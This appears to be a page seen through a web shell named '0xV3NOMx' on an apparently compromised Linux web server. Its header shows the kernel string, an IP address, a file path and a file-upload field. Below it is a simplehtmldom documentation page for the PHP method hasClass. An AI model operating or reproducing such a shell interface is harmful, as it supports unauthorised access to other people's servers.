0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 18.119.138.124


Current Path : /var/www/website/nublr/Regulations/simplehtmldom/manual/docs/api/HtmlNode/
Upload File :
Current File : /var/www/website/nublr/Regulations/simplehtmldom/manual/docs/api/HtmlNode/hasClass.md

---
title: hasClass
---

```php
hasClass ( string $class ) : bool
```

| Parameter | Description
| --------- | -----------
| `class`   | Specifies the class name to search for.

Returns true if the current node has the specified class name.

**Examples**

```php
$node->hasClass('article');
```